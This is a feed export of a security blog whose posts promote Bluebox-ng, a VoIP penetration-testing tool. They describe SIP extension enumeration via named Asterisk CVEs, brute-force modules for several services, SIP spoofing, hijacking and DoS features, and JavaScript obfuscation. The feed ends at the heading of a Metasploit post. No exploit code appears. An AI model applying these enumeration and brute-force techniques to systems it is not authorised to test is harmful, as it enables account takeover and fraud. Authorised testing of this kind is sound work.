tag:blogger.com,1999:blog-77438191581941845492024-02-19T16:23:21.724+01:00Ni ceros ni unos ...... mind overflow ...Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comBlogger31125tag:blogger.com,1999:blog-7743819158194184549.post-72194080247562210322013-09-25T14:58:00.000+02:002013-09-25T15:02:18.938+02:00SIP extension enumeration in Bluebox-ngThere are some well known SIP extension enumeration vulnerabilities in different VoIP servers, specially in Asterisk. This brute-force vector is based on the study of the authentication responses of the target server. Sometimes its replies are different in the case that the client uses a valid extension, so it's easy to discover them.<br />
<br />
This vector is normally classified as a low security risk. Moreover <a href="http://www.sinologic.net/blog/2012-03/llamame-a-mi-correo-electronico.html" target="_blank">we're moving towards a federated SIP environment</a>, in which the extension is the public email address of the user. But it's still important in some cases:<br />
<ul>
<li>To guide next steps during a penetration test. In example, you can use the discovered extension to reduce the number of attempts in the phase of SIP extensión brute-force.</li>
<li>Some RCE (Remote Code Execution) <a href="http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/" target="_blank">exploits</a> need a valid extension to work.</li>
</ul>
<div>
After a little research, these are the known vulns:</div>
<div>
<ul>
<li><a href="http://www.cvedetails.com/cve/CVE-2009-3727/" target="_blank">CVE-2009-3727</a>: It's quite old and it's practically not present in real environments. It's still not implemented in Bluebox-ng, waiting for the complete re-write of the SIP stack in which is working <a href="https://twitter.com/pamojarpan" target="_blank">Damián</a>.</li>
<li><a href="http://www.cvedetails.com/cve/CVE-2011-2536/" target="_blank">CVE-2011-2536</a>: It's much more common than the last one. The option "alwaysauthreject", which the CVE speaks about, is disabled by default in old versions of Asterisk and a common bad practice in actual ones. Bluebox-ng implements it in the "sip-brute-ext" module. In <a href="http://nicerosniunos.blogspot.com.es/2011/09/voip-information-gathering-metasploit.html" target="_blank">this old post</a> I deep a bit more in the used method.</li>
<li>(There is no CVE): This technique uses INVITE packets, there are some situations in which Asterisk allows the same goal even with the parameter "alwaysauthreject" enabled. They were discovered by Francesco Tornieri and published in <a href="http://packetstormsecurity.com/search/?q=francesco+tornieri+SIP+User+Enumeration&s=files" target="_blank">packet storm</a>. Now, the same Bluebox-ng module implements it. So <a href="https://twitter.com/dvirus" target="_blank">@dvirus</a>, you can now use it against your <a href="http://busy-tone.org/2012/11/busy-tone-vulnerable-pbx/" target="_blank">Busy Tone VulnPBX</a> virtual machine ;).</li>
</ul>
</div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7_h8tClWfXyDV93vDdYwS81kOOe6cSWbQzUHSWiNVkAEveSdhWhem3WJId8PZXQ5ZUCnbMILIB7aYuHW1DqXhg6THXT0kyUUAORrhyhnQxMFfX1-MFa7Dc8kBzpf_lBsZKw-o4JeMlRY/s1600/Captura+de+pantalla+de+2013-09-25+14:09:01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7_h8tClWfXyDV93vDdYwS81kOOe6cSWbQzUHSWiNVkAEveSdhWhem3WJId8PZXQ5ZUCnbMILIB7aYuHW1DqXhg6THXT0kyUUAORrhyhnQxMFfX1-MFa7Dc8kBzpf_lBsZKw-o4JeMlRY/s400/Captura+de+pantalla+de+2013-09-25+14:09:01.png" width="400" /></a></div>
<ul>
<li><a href="http://www.cvedetails.com/cve/CVE-2011-4597/" target="_blank">CVE-2011-4597</a>: It's similar to the other ones, but this time the server (Asterisk) answer to a different port when a valid extension exists due to an specific NAT related setup. This technique is supported through "sip-brute-ext-nat" module.</li>
</ul>
</div>
<div>
Finally I've also solved an important problem with the asynchrony in "sip-brute-pass" module which was very annoying to deploy a serious penetration test. :)</div>
<div>
<br /></div>
<div style="text-align: center;">
<a href="https://github.com/jesusprubio/bluebox-ng">https://github.com/jesusprubio/bluebox-ng</a></div>
Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-8981719562188616052013-09-16T10:23:00.000+02:002013-09-16T10:23:32.087+02:00More brute-force modules in Bluebox-ngThe last day I said that now we're going to automate all VoIP tasks trying to build a VoIP/UC vulnerability scanner. But I realized that there are some other tasks which I need in each penetration test that we could add too. This way we could avoid to use another tools for an important part of the work.<br />
<br />
Normally, we're hired to deploy a VoIP specific penetration test, but we also like to check (in a minimal way) the rest of implied services. So I've added next modules brute-force modules:<br />
<br />
<ul>
<li><b>Asterisk AMI</b>: It was a must because this is a very common scenario.</li>
<li><b>MySQL</b>: The most common DB engine among VoIP servers.</li>
<li><b>MongoDB</b>: It's not used in VoIP, but I've been playing lately with this system and I really like it. So I decided also to add a module.</li>
<li><b>SSH / (S)FTP</b>: More common protocols.</li>
<li><b>HTTP(S)</b>: Useful when we find a web management panel for a VoIP server.</li>
<li><b>TFTP</b>: Widely used in VoIP to <a href="http://bhagwad.hubpages.com/hub/What-is-Auto-Provisioning-in-VoIP-Phones" target="_blank">auto-provisioning</a> the softphones of an organization.</li>
<li><b>LDAP</b>: Sometimes the VoIP servers perform the authentication against an existent LDAP instance (Microsoft Active Directory is also included here).</li>
</ul>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmntjaU_7XhL4xoyqoKGKhIrz7_uiafhkCeypyp8MXXmrm6ctErYIR425d4DtORdEoO9tlK4B0mck8bEH5fRxb4ZWdlBGPxH9kxheDx7NuxfWdzRBjXIeVFBTVw5fZHMVwUW1T34ZHkn0/s1600/Captura+de+pantalla+de+2013-09-15+11:11:53.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmntjaU_7XhL4xoyqoKGKhIrz7_uiafhkCeypyp8MXXmrm6ctErYIR425d4DtORdEoO9tlK4B0mck8bEH5fRxb4ZWdlBGPxH9kxheDx7NuxfWdzRBjXIeVFBTVw5fZHMVwUW1T34ZHkn0/s400/Captura+de+pantalla+de+2013-09-15+11:11:53.png" width="400" /></a></div>
<br />
Finally I would like remark that, in my oppinion, we should solve next issues to build a professional tool:<br />
<br />
<ul>
<li>Network scanner: For now we're using <a href="https://github.com/eviltik/evilscan" target="_blank">Evilscan</a>, but it only supports full TCP scan (neither SYN nor UDP) and the project seems stopped.</li>
<li>Web vulnerability scanner: I don't know any tool for this written in Node.js. The most similar thing I found is <a href="https://code.google.com/p/dirscan-node/" target="_blank">Dirscan-node</a>, useful to make directory brute-force but it's not a complete web vuln scanner.</li>
</ul>
<br />
In fact, I'm using <a href="http://nmap.org/" target="_blank">Nmap</a> and <a href="https://code.google.com/p/skipfish/" target="_blank">Skipfish</a> to achieve these goals for now. So if you're thinking in a new security project (in Node.js) these ideas could be a good one. ;)Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-31523435160049764962013-09-06T09:21:00.000+02:002013-09-06T09:21:18.862+02:00Bluebox-ng beta releasedI've just pushed the last changes to <a href="https://github.com/jesusprubio/bluebox-ng" target="_blank">Bluebox-ng repo</a> to get what we consider a beta version. It's not yet finished but it's much more stable than the previous release. Here there is a resume of the changelog:<br />
<br />
<ul>
<li>IPv6 support. I would like to thank Olle E. Johansson (<a href="https://twitter.com/oej" target="_blank">@oej</a>) because of <a href="http://edvina.net/blog/category/tech/ipv6-tech/" target="_blank">his research in SIP and IPv6</a>, it did my work really easy.</li>
<li><a href="http://exploitsearch.net/">Exploitsearch.net</a> API support.</li>
<li>DNS module finished.</li>
<li>Nicer outputs.</li>
<li>Simpler setup process.</li>
<li>A network host/port scanner (<a href="https://github.com/eviltik/evilscan" target="_blank">Evilscan</a>).</li>
<li><a href="https://code.google.com/p/dirscan-node/" target="_blank">Dirscan-node</a> upgraded to version 0.5.</li>
<li>Added some numerical lists (with different paddings) to use with brute-force modules.</li>
<li>Host list files and port ranges support included in SipScan module.</li>
<li>Solved SipBrutePass module problem with too much asyncronous requests.</li>
<li>A lot of refinements in the whole code.</li>
</ul>
<br /><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFuAqXw7Mg7Ackh5TPm3MPBvhvskJ9IWTnUEv_IaqSTz7Qz_sDYOlpEtZefeWiU8cmIaoTzBG_WU-qoBZjkcYiGJyQG-Q72n3ibZHdEOHdMWbJ1jY5bw642b-b6BOEWg5aSQ1KG_fWoF4/s1600/Captura+de+pantalla+de+2013-09-05+16:43:20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFuAqXw7Mg7Ackh5TPm3MPBvhvskJ9IWTnUEv_IaqSTz7Qz_sDYOlpEtZefeWiU8cmIaoTzBG_WU-qoBZjkcYiGJyQG-Q72n3ibZHdEOHdMWbJ1jY5bw642b-b6BOEWg5aSQ1KG_fWoF4/s400/Captura+de+pantalla+de+2013-09-05+16:43:20.png" width="400" /></a></div>
<br />
I want to say that we've decided to re-define the project like a "VoIP/UC vulnerability scanner", this way we can work more focused. Our idea is to write a tool to test in an automatic way our deployments. There are several options when we think in other environments such as the web (<a href="https://code.google.com/p/skipfish/" target="_blank">Skipfish</a>, <a href="http://www.cirt.net/nikto2" target="_blank">Nikto</a>, <a href="http://w3af.org/" target="_blank">W3af</a>, etc), but we've not anything similar in VoIP.<br />
<br />
For now we have a bunch of tools (modules) that do the job in a comfortable (but indepentent) way. So, it's time to join all of them to automate the different tasks needed when we deploy an specific VoIP penetration test.<br />
<br />
Finally we hope to present the first stable version at <a href="http://gsickminds.net/" target="_blank">GSICKMINDS</a> (A Coruña, 24-25-26 October), a great security event which I recommend to everyone. We're going to have here some <a href="http://gsickminds.net/ponencias.html" target="_blank">security pr0n stars</a> and we're in <a href="https://www.google.es/search?q=coru%C3%B1a&client=ubuntu&channel=cs&um=1&ie=UTF-8&hl=es&tbm=isch&source=og&sa=N&tab=wi&authuser=0&ei=rI4oUujSCu3X7AbpxIDoCw&biw=1241&bih=568&sei=rY4oUu6bL6WO7QbB3YDYDg" target="_blank">one of best places</a> in the world to enjoy a few days. ;)Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-18114911553344206162013-06-10T17:05:00.002+02:002013-06-10T17:07:11.048+02:00Bluebox-ng Alpha releaseFinally I've pushed the first Alpha version of Bluebox-ng to my GitHub repo: <a href="https://github.com/jesusprubio/bluebox-ng">https://github.com/jesusprubio/bluebox-ng</a><br />
<div>
<br /></div>
<div>
<b>Features</b></div>
<div>
<ul>
<li>RFC compliant</li>
<li>TLS and IPv6 support</li>
<li>SIP over websockets (and WSS) support (draft-ietf-sipcore-sip-websocket-08)</li>
<li>SHODAN and Google Dorks</li>
<li>SIP common security tools (scan, extension/password bruteforce, etc.)</li>
<li>REGISTER, OPTIONS, INVITE, MESSAGE, SUBSCRIBE, PUBLISH, OK, ACK, CANCEL, BYE and Ringing requests support</li>
<li>Authentication through different types of requests.</li>
<li>SIP denial of service (DoS) testing</li>
<li>SRV and NAPTR discovery</li>
<li>Dumb fuzzing</li>
<li>Common VoIP servers web management panels discovery</li>
<li>Automatic exploit searching (Exploit DB, PacketStorm, Metasploit)</li>
<li>Automatic vulnerability searching (CVE, OSVDB)</li>
<li>Geolocation</li>
<li>Colored output</li>
<li>Command completion</li>
<li>GNU/Linux, Mac OS X and Windows</li>
</ul>
</div>
<div>
I'm sorry but we still do not have documentation about the tool. For now, we have the README file included in the source code (which shows the steps to start the tool) and <a href="http://www.securitybydefault.com/2013/06/bluebox-ng-alpha-release.html" target="_blank">this another post in Security by Default blog</a> which includes some more shoots of this first version.<br />
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbEXV4AyNaAbKjsNR2-zcnMBLip1cIXt6OZ0lhWdT-taCaT8fJyJTAA8Uz4f1jNHu7_-N8mwCk2adCxSa1wr1Shtj_kGrz0UPBfdGkEuRjnCmfGdW-HYmrD79unGL-jsNUSQuow4Zn2oc/s1600/Captura+de+pantalla+de+2013-06-09+14%253A45%253A28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbEXV4AyNaAbKjsNR2-zcnMBLip1cIXt6OZ0lhWdT-taCaT8fJyJTAA8Uz4f1jNHu7_-N8mwCk2adCxSa1wr1Shtj_kGrz0UPBfdGkEuRjnCmfGdW-HYmrD79unGL-jsNUSQuow4Zn2oc/s400/Captura+de+pantalla+de+2013-06-09+14%253A45%253A28.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqSWo0fwVpgMV66eJE0ToHlMM2ukoa24exz1x0f_xo0N57HEgwqu-b2Bguj1reDMCEN2kAAl3rimpF16cZjA1SDwhkP4oBeB-T-sSmU95gqJTMyZFVAWnMgEXn55MwJxEfUzCSkLl3jxo/s1600/Captura+de+pantalla+de+2013-06-09+14%253A59%253A40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqSWo0fwVpgMV66eJE0ToHlMM2ukoa24exz1x0f_xo0N57HEgwqu-b2Bguj1reDMCEN2kAAl3rimpF16cZjA1SDwhkP4oBeB-T-sSmU95gqJTMyZFVAWnMgEXn55MwJxEfUzCSkLl3jxo/s400/Captura+de+pantalla+de+2013-06-09+14%253A59%253A40.png" width="400" /></a></div>
</div>
Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-38603014357602832412013-03-27T00:52:00.003+01:002013-06-06T01:39:54.611+02:00My new toy: Bluebox-ng<div class="separator" style="clear: both; text-align: left;">
Hi again guys, here there is my new personal project. I think that README file is complete enough so I paste it on this post.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Next month I'll be with my colleague <a href="https://twitter.com/AntonRoman" target="_blank">Antón</a> at <a href="http://conference.kamailio.com/k01/" target="_blank">Kamalio World Conference</a> showing a bit more about it. If you are there and want to talk a bit about VoIP security (or WebRTC) get in contact with us please. :)</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Finally, we would like to publish the first version in one ore two months, sorry but we're developing it mostly in our free time :(. I've promised <a href="https://twitter.com/YJesus" target="_blank">Yago</a> to do it on <a href="http://www.securitybydefault.com/" target="_blank">Security by Default</a> blog so stay tuned. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Moreover this tool was included in Quobis personal project plan so you can always follow <a href="http://planet.quobis.com/" target="_blank">Quobis planet</a> in which we publish all our experiments.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Nothing else, I hope you like it and all kind of suggestions (and coders) are welcomed :).</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: inherit; font-size: x-large; text-align: center;"></span></div>
<div style="text-align: center;">
<span style="font-family: inherit; font-size: x-large; text-align: center;"><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/02AuYf66sx0?feature=player_embedded' frameborder='0'></iframe></span></div>
<div style="text-align: center;">
<br /></div>
<h3>
<span style="font-family: inherit; font-size: x-large; text-align: center;">Bluebox-ng</span></h3>
Bluebox-ng is a next generation UC/VoIP security tool. It has been written in CoffeeScript using Node.js powers. This project is "our 2 cents" to help to improve information security practices in VoIP/UC environments.<br />
<ul>
<li> GitHub repo: <a href="https://github.com/jesusprubio/bluebox-ng">https://github.com/jesusprubio/bluebox-ng</a></li>
<li>Demo: <a href="http://www.youtube.com/watch?v=02AuYf66sx0">http://www.youtube.com/watch?v=02AuYf66sx0</a></li>
</ul>
<div>
<br /></div>
<h3>
Install deps</h3>
<ul>
<li> cd bluebox-ng</li>
<li>npm install</li>
</ul>
<h3>
Run</h3>
<ul>
<li>npm start</li>
</ul>
<div>
<br /></div>
<h3>
Features</h3>
<ul>
<li>Automatic pentesting process (VoIP, web and service vulns)</li>
<li>SIP (RFC 3261) and extensions compliant</li>
<li>TLS and IPv6 support</li>
<li>VoIP DNS SRV register support</li>
<li>SIP over websockets (and WSS) support (draft-ietf-sipcore-sip-websocket-08)</li>
<li>REGISTER, OPTIONS, INVITE, MESSAGE, SUBSCRIBE, PUBLISH, OK, ACK, CANCEL, BYE, Ringing and Busy Here requests support</li>
<li>Extension and password brute-force through different methods (REGISTER, INVITE, SUBSCRIBE, PUBLISH, etc.)</li>
<li>DNS SRV registers discovery</li>
<li>SHODAN and Google Dorks</li>
<li>SIP common vulns modules: scan, extension brute-force, Asterisk extension brute-force (CVE-2011-4597), invite attack, call all LAN endpoints, invite spoofing, registering hijacking, unregistering, bye teardown</li>
<li>SIP DoS/DDoS audit</li>
<li>SIP dumb fuzzer</li>
<li>Common VoIP servers web management panels discovery and brute-force</li>
<li>Automatic exploit searching (Exploit DB, PacketStorm, Metasploit)</li>
<li>Automatic vulnerability searching (CVE, OSVDB)</li>
<li>Geolocalization using WPS (Wifi Positioning System) or IP address (Maxmind database)</li>
<li>Colored output</li>
<li>Command completion</li>
</ul>
<div>
<br /></div>
<h3>
Roadmap</h3>
<ul>
<li> Tor support</li>
<li>More SIP modules </li>
<li>SIP Smart fuzzing (SIP Torture RFC)</li>
<li>Eavesdropping</li>
<li>CouchDB support (sessions)</li>
<li>H.323 support</li>
<li>IAX support</li>
<li>Web common panels post-explotation (Pepelux research)</li>
<li>A bit of command Kung Fu post-explotation</li>
<li>RTP fuzzing</li>
<li>Advanced SIP fuzzing with Peach</li>
<li>Reports generation</li>
<li>Graphical user interface</li>
<li>Windows support</li>
<li>Include in Debian GNU/Linux</li>
<li>Include in Kali GNU/Linux</li>
<li>Team/multi-user support</li>
<li>Documentation</li>
<li>...</li>
<li>Any suggestion/piece of code ;) is appreciated.</li>
</ul>
<div>
<br /></div>
<h3>
Author</h3>
Jesús Pérez<br />
<ul>
<li><a href="https://twitter.com/jesusprubio" target="_blank">@jesusprubio</a></li>
<li>jesusprubio gmail com</li>
<li><a href="http://nicerosniunos.blogspot.com/">http://nicerosniunos.blogspot.com/</a></li>
</ul>
<div>
<br /></div>
<h3>
Contributors</h3>
Damián Franco<br />
<ul>
<li><a href="https://twitter.com/pamojarpan" target="_blank">@pamojarpan</a></li>
<li>pamojarpan google com</li>
</ul>
Jose Luis Verdeguer<br />
<ul>
<li>@pepeluxx](https://twitter.com/pepeluxx)</li>
<li>pepelux enye-sec org</li>
<li><a href="http://www.pepelux.org/">http://www.pepelux.org/</a></li>
</ul>
<div>
<br /></div>
<h3>
Thanks to ...</h3>
<ul>
<li><a href="http://www.quobis.com/" target="_blank">Quobis</a>, some hours of work through personal projects program</li>
<li>Antón Román (<a href="https://twitter.com/antonroman" target="_blank">@AntonRoman</a>), he speaks SIP and I'm starting to speak it thanks to him</li>
<li>Sandro Gauci (<a href="https://twitter.com/sandrogauci" target="_blank">@sandrogauci</a>), SIPVicious was our inspiration</li>
<li>Kamailio community (<a href="https://twitter.com/kamailioproject" target="_blank">@kamailioproject]</a>), my favourite SIP Server</li>
<li>David Endler and Mark Collier (<a href="https://twitter.com/markcollier46" target="_blank">@markcollier46</a>), authors of <a href="http://www.hackingvoip.com/" target="_blank">"Hacking VoIP Exposed" book</a></li>
<li>John Matherly (<a href="https://twitter.com/achillean" target="_blank">@achillean</a>) for SHODAN API and GHDB</li>
<li>All VoIP, free software and security hackers that we read everyday</li>
<li><a href="https://soundcloud.com/loopsize" target="_blank">Loopsize</a>, a music hacker (and a friend) creator of the themes included in demos</li>
</ul>
<div>
<br /></div>
<h3>
License</h3>
This program is free software: you can redistribute it and/or modify<br />
it under the terms of the GNU General Public License as published by<br />
the Free Software Foundation, either version 3 of the License, or<br />
(at your option) any later version.<br />
<br />
This program is distributed in the hope that it will be useful,<br />
but WITHOUT ANY WARRANTY; without even the implied warranty of<br />
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the<br />
GNU General Public License for more details.<br />
<br />
You should have received a copy of the GNU General Public License<br />
along with this program. If not, see <http: licenses="" www.gnu.org="">.</http:>Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-39354400830520575342013-02-26T12:06:00.000+01:002013-02-26T13:11:14.826+01:00How to protect your WebRTC app code?I have spent some time analyzing which could be the best way to protect a privative version of a webphone based on <a href="http://qoffeesip.quobis.com/" target="_blank">QoffeeSIP</a> that we are developing now at <a href="http://quobis.com/" target="_blank">Quobis</a>. I have seen this same question on different sites with quite confusing responses. So I'm going to share what I learned just in case it could help to anybody.<br />
<br />
Well, I'm not going to define what is WebRTC because Internet is full of it this year (<a href="http://www.youtube.com/watch?v=zi8VTeDHjcM" target="_blank">only overtaken by cats</a> ;). For our purposes we have to consider that our app is a Javascript library. Really there is also HTML/CSS code but what I think that is important is Javascript, but HTML/CSS can also be protected in the same way but with other tools.<br />
<br />
First of all I want to remark that protect your code in the sense of anybody could copy/modify and redistribute it <b>is impossible</b> since Javascript is only text. If anybody had enough time (or money) this code could be reversed. But, as always, we can do things trying to avoid it as far as possible.<br />
<br />
In general, I found that there is a bit confusion between minimize and obfuscate terms so we're going to speak a bit about these techniques.<br />
<br />
<b><span style="font-size: large;">Minimization</span></b><br />
<br />
The target is to get the code as small as possible. Obviously generated code is more difficult to understand, but it could be easily reversed with tools like <a href="http://jsbeautifier.org/" target="_blank">JSbeautifier</a>. (really not as easy depending of the minimizing tool)<br />
<br />
Some common possible options at this point are:<br />
<br />
<ul>
<li><a href="https://github.com/mishoo/UglifyJS" target="_blank">UglifyJS</a>: The coolest thing right now xD. It is a Node.js package so it's easy to include. Some days ago version 2 was published. We will see that it's fast, really fast.</li>
<li><a href="https://developers.google.com/closure/compiler/" target="_blank">Google Closure Compiler</a> which uses Google to its apps. It is availiable a Java command line tool but there are <a href="https://github.com/weaver/scribbles/tree/master/node/google-closure/" target="_blank">node modules</a> which use the online API.</li>
<li><a href="http://yui.github.com/yuicompressor/" target="_blank">YUI Compressor</a> from Yahoo, it was the facto standard but now last alternatives are beating it.</li>
</ul>
A little comparison: I can't find original link, sorry :(<br />
<ul>
<li>Average time: (lower is better)</li>
<ul>
<li>UglifyJS: 0.11554 seconds</li>
<li>Closure: 1.41037 seconds</li>
</ul>
<li>Average reducction: (higher is better)</li>
<ul>
<li> UglifyJS: 45.6%</li>
<li>Closure: 51.5%</li>
</ul>
</ul>
NOTE: <a href="http://blog.foxxtrot.net/2010/12/a-comparison-of-javascript-compressors.html" target="_blank">Another one</a> (more complete) with YUI included too.<br />
<br />
In my experience Google Closure generated code is better because besides minimization tasks it includes code checking too. It provides warnings for dangerous or illegal Javascript. Moreover I like that you can use <a href="http://closure-compiler.appspot.com/home" target="_blank">this online service</a> to check your code while developing.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEs7en8XdyZj2nuXpPUOTyoFfmNcVgYMF7SlyUaNGcDGurwvzVjWo8rapaysMFg6wRD1Vu7VfuUTcIgwls5MmTfGPiVCYwgleNFhcD4zFWPIHmpcW8G0D2-2BrU4dYhuUdmGsb8irV3Uo/s1600/Captura+de+pantalla+de+2013-02-26+11:20:15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEs7en8XdyZj2nuXpPUOTyoFfmNcVgYMF7SlyUaNGcDGurwvzVjWo8rapaysMFg6wRD1Vu7VfuUTcIgwls5MmTfGPiVCYwgleNFhcD4zFWPIHmpcW8G0D2-2BrU4dYhuUdmGsb8irV3Uo/s400/Captura+de+pantalla+de+2013-02-26+11:20:15.png" width="400" /></a></div>
<br />
<br />
<b><span style="font-size: large;">Obfuscation</span></b><br />
<br />
It is defined as <i>"the hiding of intended meaning in communication, making communication confusing, wilfully ambiguous, and harder to interpret."</i> (Wikipedia).<br />
<br />
We have some options here when we are working with a web app:<br />
<ul>
<li><b>Encrypt the transport layer</b>: needed to avoid sniffing to another users of the same LAN. So using HTTPS to serving the application is a must.</li>
<li><b>Encryption</b>: Encrypt application data and decrypt it on the fly via your own javascript enccryption library.</li>
<li>Move functions to the server side, which it's not possible in the case of WebRTC because we want end to end media.</li>
<li>Use a browser plugin, it has no sense since one of the advantages of WebRTC is that the user doesn't have to install anything.</li>
<li>Implement the code in native client for Chrome browser. The advantaje is that common C code protections can be used and the app runs sandboxed. But it is not our case because we need multi-platform support.</li>
<li>To avoid legal issues you should <b>incude a note (a Javascript comment)</b> referencing the copyright in each copy of the .js library. Something similar to <a href="http://www.gnu.org/philosophy/javascript-trap.html" target="_blank">Free Software Foundation recommendations</a> for free Javascript code. An example could be:</li>
</ul>
NOTE: Really @source tag is proposed by FSF to include a link to source code of the app. But I think that it could be a good idea to use it because browser plugins <a href="http://www.gnu.org/software/librejs/" target="_blank">that follow the recommendations</a> should "understand" it.<br />
<div>
<br /></div>
<div>
// @source: https://qoffeesip.quobis.com<br />
// Copyright (C) Quobis<br />
// Licensed under Quobis Commercial license<br />
// (http://www.quobis.com/licenses/commercial-1.0.html)<br />
<br />
I also want to point out some common obfuscation/encryption problems:<br />
<ul>
<li>Performance decrement, specially speed.</li>
<li>Increase troubleshooting difficult.</li>
<li>Compatibility problems (IE!!).</li>
<li>Size increase.</li>
<li>As it was said, a skilled expert could always reverse it and get a code equivalent to ours.</li>
</ul>
All these problems are more important on the case of encryption, except the last one logically. So at this point we have some options, but I've reduced them to these ones:<br />
<ul>
<li>A paid option like <a href="https://jscrambler.com/" target="_blank">JsCrambler</a>: This is the reference tool, generated code seems to be really dificult to recover and it supports an important number of encryption algorithms.</li>
</ul>
<ul>
<li>A free solution provided by my colleague <a href="https://twitter.com/pamojarpan">Damián</a>: <a href="https://github.com/TShadwell/Horrible.js">Horrible.js</a>. It implements obfuscation and a kind of simple (so light) optional (through "factor" parameter) encryption. Next picture shows an example using it with the three different factors.</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjPhApuFDwmNXScMzs9ksrJMkT6JhkGZicWSc69384IYdWK0FTiKApppRCwr6HkwCN5jD0EJnsWuzFp0mghl3O9HL7bs7L8HLC-OuWp6En_AZJZD35-G85AgTxToViKdJNW3-nf3Qma0E/s1600/Captura+de+pantalla+de+2013-02-26+11%253A44%253A07.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjPhApuFDwmNXScMzs9ksrJMkT6JhkGZicWSc69384IYdWK0FTiKApppRCwr6HkwCN5jD0EJnsWuzFp0mghl3O9HL7bs7L8HLC-OuWp6En_AZJZD35-G85AgTxToViKdJNW3-nf3Qma0E/s400/Captura+de+pantalla+de+2013-02-26+11%253A44%253A07.png" width="400" /></a></div>
<div>
<br />
Finally, if you don't like the ugly generated code you can always use <a href="https://github.com/TShadwell/Nice.js" target="_blank">Nice.js</a> to get something like this example: xD<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_1xcjockAZQAXiWnppS6fG7LQWKwK_cYF7jkPHeYR_5VnFYhymDAhUSZYfvslg2ULPOtEpYQgbm9oe0icJVz7pb5EmllR3y7e_gBGfgGSKsZOpLzOBAP86r6-3vcRmzTrbJRmEWFtpEs/s1600/Captura+de+pantalla+de+2013-02-26+11:49:40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_1xcjockAZQAXiWnppS6fG7LQWKwK_cYF7jkPHeYR_5VnFYhymDAhUSZYfvslg2ULPOtEpYQgbm9oe0icJVz7pb5EmllR3y7e_gBGfgGSKsZOpLzOBAP86r6-3vcRmzTrbJRmEWFtpEs/s400/Captura+de+pantalla+de+2013-02-26+11:49:40.png" width="400" /></a></div>
<br />
<br />
In conclusion, I like Horrible.js with factor 3. In my opinion, it has no sense to paid for mitigating a risk impossible to solve completely.<br />
<br />
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">
</div>
</div>
</div>
Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-32796841532635558512013-01-19T18:26:00.000+01:002013-01-19T19:05:57.350+01:00SIP INVITE attack with Metasploit<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: start;">
